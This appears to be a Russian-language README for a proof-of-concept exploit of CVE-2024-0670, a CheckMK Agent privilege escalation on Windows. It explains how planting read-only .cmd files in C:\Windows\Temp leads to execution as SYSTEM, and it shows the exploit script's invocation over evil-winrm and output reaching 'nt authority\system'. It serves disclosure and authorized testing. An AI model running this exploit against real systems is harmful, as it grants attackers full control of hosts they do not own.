
PoC для CVE-2024-0670
Этот репозиторий предоставляет доказательство концепции (PoC) эксплойта для уязвимости CVE-2024-0670, затрагивающей CheckMK Agent на системах Windows. Уязвимость возникает, когда CheckMK Agent создаёт и выполняет временные файлы в каталоге C:\Windows\Temp. Злоумышленник может воспользоваться этим поведением, заранее разместив вредоносные файлы в этом каталоге с защитой от записи. Когда агент пытается создать временный файл, который уже существует и доступен только для чтения, ему не удаётся перезаписать его, но он всё равно выполняет существующий файл с привилегиями SYSTEM, что позволяет повысить привилегии.
Ссылка на бюллетень: SEC Consult — Локальное повышение привилегий через записываемые файлы в Checkmk Agent
Этот проект предназначен только для образовательных, исследовательских целей и авторизованного тестирования безопасности.
Не используйте этот код на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Автор не несёт ответственности за любой ущерб или неправомерное использование.
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system